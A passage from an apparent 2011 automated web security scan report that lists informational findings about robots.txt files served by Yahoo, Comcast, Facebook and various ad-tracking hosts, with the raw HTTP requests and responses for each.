Server: YTS/1.20.5
x-ysws-request-id: 618e0a9d-abd0-49a6-821c-b2e33e11d331

User-agent: *
Disallow:
Sitemap: http://movies.yahoo.com/sitemap.xml

22.46. http://music.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: music.yahoo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 202
Content-Type: text/plain
Last-Modified: Fri, 21 Sep 2007 22:37:21 GMT
Accept-Ranges: bytes
ETag: "e7892f99ffcc71:16afec"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 12:45:07 GMT
Connection: close

# Robots exclusions file for music.yahoo.com

User-agent: *
Disallow: /rss/
Disallow: /library/
Disallow: /videos/*/top/*
Disallow: /videos/*s=*
Disallow: /vidoes/*page=1*
Disallow: /launchcas
...[SNIP]...

22.47. http://new.music.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: new.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 22 Aug 2011 13:09:31 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

# Robots exclusions file for new.music.yahoo.com

User-agent: *
Disallow: /rss/
Disallow: /library/
Disallow: /videos/*/top/*
Disallow: /videos/*s=*
Disallow: /vidoes/*page=1*
Disallow: /searc
...[SNIP]...

22.48. http://o.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:01 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Tue, 21 Jun 2011 13:20:59 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

22.49. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:29:53 GMT
Expires: Wed, 07 Sep 2011 12:29:53 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.50. http://pixel.everesttech.net/2565/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "1b883b-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=999865
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

22.51. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

22.52. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.53. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

User-agent: *
Disallow: /

22.54. http://postcalc.usps.gov/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /WebResource.axd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: postcalc.usps.gov

Response

HTTP/1.0 200 OK
Cteonnt-Length: 165
Content-Type: text/plain
Last-Modified: Fri, 08 Apr 2011 19:00:10 GMT
ETag: "019d02e1ff6cb1:119d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=2608
Date: Tue, 06 Sep 2011 12:53:06 GMT
Content-Length: 165
Connection: close

# robots should not look for files with the extemsion .axd
# example: WebResource.axd and ScriptResource.axd

User-agent: *
Disallow: /*.axd$
Disallow: /*.ashx$

22.55. http://r.casalemedia.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 11:59:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:04 GMT
Connection: close

User-agent: *
Disallow: /

22.56. http://realestate.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: realestate.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 17 Jun 2011 07:06:48 GMT
Accept-Ranges: bytes
Content-Length: 121
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: Googlebot
Disallow: /xml/

User-agent: *
Disallow: /xml/

Sitemap: http://realestate.yahoo.com/sitemap.xml

22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /1033846/mmna_i_likeable_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 12:29:53 GMT
Expires: Wed, 07 Sep 2011 12:29:53 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

22.58. http://search.keywordblocks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.keywordblocks.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 25 Aug 2011 15:47:27 GMT
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

22.59. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 24 Aug 2011 19:22:59 GMT
Accept-Ranges: bytes
Content-Length: 82
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /search
Disallow: /bin
Disallow: /language
Disallow: /yhs

22.60. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:24 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.61. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "27e01b-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www431
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.63. http://servicetips.whitefence.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servicetips.whitefence.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: servicetips.whitefence.com

Response

HTTP/1.0 200 OK
Content-Type: text/html
ETag: "76397c94314f7a16f0d5d15c36c5b58db47df1ee"
Server: TornadoServer/0.1
Date: Tue, 06 Sep 2011 11:59:35 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow:
Sitemap: http://servicetips.whitefence.com/sitemap.xml

22.64. http://shopping.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 16 Sep 2010 00:55:27 GMT
Accept-Ranges: bytes
Content-Length: 265
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: googlebot
Disallow: /search


User-agent: slurp
Disallow: /search


User-agent: *
Disallow: /search
Disallow: /stores/

User-agent: msnbot
Disallow: /search

User-agent: bingbot
Disallow
...[SNIP]...

22.65. http://show.partners-z.com/s/show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: show.partners-z.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:55 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 06 Jul 2011 19:16:40 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.66. http://sitesearch.comcast.com/static.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /static.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sitesearch.comcast.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 10 Aug 2011 17:12:43 GMT
ETag: "406e11-398-c9ced8c0"
Accept-Ranges: bytes
Content-Length: 920
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /connectyourfreewii
Disallow: /About/PressRelease/PressReleaseDetail.ashx?PRID=305
Disallow: /About/PressRelease/PressReleaseD
...[SNIP]...

22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Thu, 08 Sep 2011 04:57:13 GMT
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

User-agent: *
Disallow: /

22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /tools/ResetPassword.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: support.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:50 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Last-Modified: Tue, 18 Dec 2007 15:42:59 GMT
ETag: "8d24c0e-1a-621d66c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.71. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.72. http://t.pointroll.com/PointRoll/Track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /PointRoll/Track/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:575"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:49:35 GMT
Connection: close

User-agent: *
Disallow: /

22.73. http://tags.mathtag.com/view/js/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mathtag.com
Path:   /view/js/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tags.mathtag.com

Response

HTTP/1.1 200 OK
x-mm-host: pao-bidder-x8
Server: MMBD/3.5.14.3
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:44:55 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow: /

22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:02:35 GMT
Expires: Tue, 06 Sep 2011 12:02:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.75. http://udmserve.net/udm/img.fetch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: udmserve.net

Response

HTTP/1.0 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3074352879"
Last-Modified: Wed, 04 May 2011 06:13:47 GMT
Content-Length: 26
Connection: keep-alive
Date: Tue, 06 Sep 2011 12:45:58 GMT
Server: lighttpd/1.4.28

User-Agent: *
Disallow: /

22.76. http://us.bc.yahoo.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

22.77. http://utdi.reachlocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: utdi.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 26
Keep-Alive: timeout=12, max=85
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

User-agent: *
Disallow: /

22.78. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: utdi.reachlocal.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Tue, 16 Feb 2010 23:59:27 GMT
ETag: "1c-47fc08617d5c0"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=12, max=79
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

User-agent: *
Disallow: /

22.79. http://video.music.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: video.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 19 Feb 2008 21:32:31 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /b/ss/pcwhitefencecom/1/H.21/s91730218948796

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3514c-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www164
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adfusion.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 14:41:28 GMT
Accept-Ranges: bytes
ETag: "16c1e294225ccc1:244b"
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:44:58 GMT
Connection: close

User-agent: *
Disallow:

22.82. http://www.aptela.com/lp2011/T2V1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 19:07:26 GMT
ETag: "1c6c00e-4e-671c1780"
Accept-Ranges: bytes
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin/
Sitemap: http://www.aptela.com/sitemap.xml

22.83. http://www.burstnet.com/enlightn/8117/3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 09 Mar 1999 03:20:24 GMT
ETag: "596a48-1a-36e49378"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close

User-agent: *
Disallow: /

22.84. http://www.comcast.com/shop/buyflow/default.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /shop/buyflow/default.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 1344
Content-Type: text/plain
Last-Modified: Fri, 02 Sep 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "bd03619f69cc1:1343"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 11:59:16 GMT
Connection: close

# Comcast
# robots.txt for http://www.comcast.com
# Created on 2011-06-16 by IPQ-ED
# Edited on 2011-08-24 by IPQ-ED
# Edited on 2011-08-24 by CMC-JS


# Disallow all crawlers access to certa
...[SNIP]...

22.85. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 1344
Content-Type: text/plain
Last-Modified: Fri, 02 Sep 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "bd03619f69cc1:1343"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 11:59:21 GMT
Connection: close
Vary: Accept-Encoding

# Comcast
# robots.txt for http://www.comcast.com
# Created on 2011-06-16 by IPQ-ED
# Edited on 2011-08-24 by IPQ-ED
# Edited on 2011-08-24 by CMC-JS


# Disallow all crawlers access to certa
...[SNIP]...

22.86. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.42.46
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.87. http://www.frontier.com/yahoo/fy_excl2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

